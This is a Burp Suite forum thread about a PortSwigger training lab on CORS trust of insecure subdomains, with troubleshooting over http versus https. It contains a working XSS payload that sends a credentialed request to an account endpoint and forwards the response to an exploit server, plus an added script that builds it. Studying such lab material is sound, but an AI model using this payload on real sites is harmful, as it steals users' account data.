Burp Suite User Forum


Lab Not Working Anymore : CORS vulnerability with trusted insecure protocols

Achint | Last updated: Apr 12, 2024 09:22AM UTC

I am trying to solve the mentioned lab with the payload provided by the academy, but the payload isn't working. When I view the payload, the request is indeed sent to the stock subdomain, but it replies with "Unauthorized", since the cookie is not included in the request.

## Payload

```html
<script>
document.location="http://stock.0ad000570345633e81fd1b55005d001d.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ad000570345633e81fd1b55005d001d.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0a8d001a039663f481a91aaa0144009c.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
```

## Response From /accountDetails

```http
HTTP/2 401 Unauthorized
Content-Type: application/json; charset=utf-8
Set-Cookie: session=EgIsHteiGser2A2asuxMQRV1BMAKIFfg; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 14

"Unauthorized"
```

I am using Burp's in-built browser.
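As an added example (not part of the post above and not PortSwigger's lab code), the following Node.js script assembles the same two-stage payload so that the encoding decisions visible in the posted exploit (`%2b` for `+`, `%3c` for `<`) are explicit and testable. `lab.example` and `exploit.example` are placeholder hostnames, and `reflectedProductId` assumes the stock page reflects the URL-decoded `productId` parameter into its HTML, which is the sink the posted payload relies on.

```javascript
// Added example, not code from the forum post or from the PortSwigger lab.
// It assembles the lab's two-stage CORS exploit so that the encoding choices
// in the posted payload ('%2b' for '+', '%3c' for '<') are explicit.
const LAB_HOST = "lab.example";         // assumed placeholder for the lab hostname
const EXPLOIT_HOST = "exploit.example"; // assumed placeholder for the exploit server

// Stage 2: the script that runs on the stock subdomain once it is reflected
// there. It sends a credentialed cross-origin request to the main lab origin
// and exfiltrates the response body to the exploit server's /log endpoint.
function innerScript(labHost, exploitHost) {
  return [
    "var req = new XMLHttpRequest();",
    "req.onload = reqListener;",
    `req.open('get','https://${labHost}/accountDetails',true);`,
    "req.withCredentials = true;",
    "req.send();",
    `function reqListener() { location='https://${exploitHost}/log?key='+this.responseText; };`,
  ].join(" ");
}

// Stage 1: the stock-subdomain URL carrying the script in productId. The
// script is percent-encoded as a whole: an unencoded '+' in a query string
// decodes to a space, and a literal '</script>' would close the outer
// <script> tag of the exploit page early.
function buildStockUrl(scheme, labHost = LAB_HOST, exploitHost = EXPLOIT_HOST, productId = 4) {
  const payload = `${productId}<script>${innerScript(labHost, exploitHost)}</script>`;
  return `${scheme}://stock.${labHost}/?productId=${encodeURIComponent(payload)}&storeId=1`;
}

// The HTML hosted on the exploit server: it only redirects the victim.
function buildExploitPage(scheme, labHost = LAB_HOST, exploitHost = EXPLOIT_HOST) {
  return `<script>document.location=${JSON.stringify(buildStockUrl(scheme, labHost, exploitHost))}</script>`;
}

// Simulates the stock endpoint's view of the parameter after URL decoding,
// i.e. the value it reflects into its HTML (the XSS sink the payload assumes).
function reflectedProductId(url) {
  return new URL(url).searchParams.get("productId");
}

// The origin the browser will send in the Origin header of the stage-2
// request; this is what the main lab server's CORS check sees.
function stage2Origin(url) {
  return new URL(url).origin;
}

// Demonstrates why '+' must be encoded: URLSearchParams decodes '+' to ' '.
function decodeQueryValue(rawValue) {
  return new URL(`https://${LAB_HOST}/?v=${rawValue}`).searchParams.get("v");
}
```

Switching the `scheme` argument between `http` and `https` changes only the origin that the stage-2 request will carry, which is the single variable the thread is about; everything else in the chain stays identical.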

Achint | Last updated: Apr 12, 2024 09:25AM UTC

Found the solution: this is because the lab is setting the `Secure` flag on the cookie, but the mentioned payload specifies `http` for the stock subdomain, hence the cookie is not sent. Kindly fix that.

Ben, PortSwigger Agent | Last updated: Apr 12, 2024 09:36AM UTC

Hi Achint,

Having just run through this lab using the embedded browser in the latest version of Burp, I am able to successfully solve it using the solution provided, so it does still appear to be working as expected. Are you logged into the wiener user account when you come to carry out the 'View exploit' functionality and test your exploit?

Achint | Last updated: Apr 12, 2024 09:45AM UTC

Yes, I am logged in as wiener. When I do `View Exploit`, it does land me on the stock subdomain, but the request to /accountDetails returns "Unauthorized". Changing the protocol from http to https for the subdomain works.

Achint | Last updated: Apr 12, 2024 09:48AM UTC

# Console Error

```
Access to XMLHttpRequest at 'https://0ad000570345633e81fd1b55005d001d.web-security-academy.net/accountDetails' from origin 'http://stock.0ad000570345633e81fd1b55005d001d.web-security-academy.net' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.
```

Ben, PortSwigger Agent | Last updated: Apr 12, 2024 11:02AM UTC

Hi Achint,

Is it possible for you to send some screenshots or a video of the complete set of steps that you are using, so that we can see this exactly? The behaviour that you are seeing is not what I am experiencing, so getting some more details would be very useful.
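As an added example (not PortSwigger's lab code and not part of any post in this thread), the Node.js script below models the server-side origin check the lab title describes, a subdomain allowlist that trusts any scheme, next to a hardened version, and the browser's read/block decision on the response, so that the console error quoted above can be reproduced offline. `lab.example` is a placeholder hostname; the vulnerable policy is written from the lab's description, not from its real source.

```javascript
// Added example, not PortSwigger's lab code: the server-side origin check in
// the shape the lab title describes (subdomains trusted on any scheme) next
// to a hardened version, plus the browser's read/block decision on the
// response, so the console error quoted in the thread can be reproduced.
const LAB_HOST = "lab.example"; // assumed placeholder for the lab hostname

function parseOrigin(origin) {
  try { return new URL(origin); } catch { return null; }
}

// Vulnerable: any subdomain of the lab is trusted whatever its scheme, so an
// XSS on an http:// subdomain hands the attacker a trusted origin.
function vulnerableCorsHeaders(origin, labHost = LAB_HOST) {
  const u = parseOrigin(origin);
  if (!u) return {};
  const trusted = u.hostname === labHost || u.hostname.endsWith("." + labHost);
  if (!trusted) return {};
  return {
    "Access-Control-Allow-Origin": u.origin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened: only https origins from an explicit allowlist are reflected, and
// Vary: Origin keeps caches from serving one origin's ACAO to another.
function hardenedCorsHeaders(origin, labHost = LAB_HOST, allowedSubdomains = ["stock"]) {
  const u = parseOrigin(origin);
  if (!u || u.protocol !== "https:") return {};
  const allowlist = allowedSubdomains.map((s) => `${s}.${labHost}`);
  if (!allowlist.includes(u.hostname)) return {};
  return {
    "Access-Control-Allow-Origin": u.origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Browser side: a credentialed (withCredentials = true) response is readable
// only when ACAO exactly equals the requesting origin (no wildcard) and ACAC
// is "true". Anything else is blocked and reported on the console.
function corsDecision(requestOrigin, responseHeaders, withCredentials = true) {
  const acao = responseHeaders["Access-Control-Allow-Origin"];
  const acac = responseHeaders["Access-Control-Allow-Credentials"];
  if (acao === undefined) {
    return { readable: false, reason: "No 'Access-Control-Allow-Origin' header is present on the requested resource." };
  }
  if (acao === "*") {
    return withCredentials
      ? { readable: false, reason: "wildcard Access-Control-Allow-Origin is not allowed with credentials" }
      : { readable: true, reason: "" };
  }
  if (acao !== requestOrigin) {
    return { readable: false, reason: `Access-Control-Allow-Origin '${acao}' does not match origin '${requestOrigin}'` };
  }
  if (withCredentials && acac !== "true") {
    return { readable: false, reason: "Access-Control-Allow-Credentials is not 'true'" };
  }
  return { readable: true, reason: "" };
}

// Whether the stage-2 XHR from a given origin can read /accountDetails
// against a server applying the given header policy.
function exploitReadsResponse(stage2Origin, policy) {
  return corsDecision(stage2Origin, policy(stage2Origin)).readable;
}
```

The vulnerable policy reflects `http://stock.lab.example`, which is exactly why an XSS on the cleartext subdomain is enough to read the response cross-origin; the hardened one refuses that origin even though the hostname is on the allowlist, because the scheme is part of the origin and a cleartext subdomain can be hijacked by anyone on the network path.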
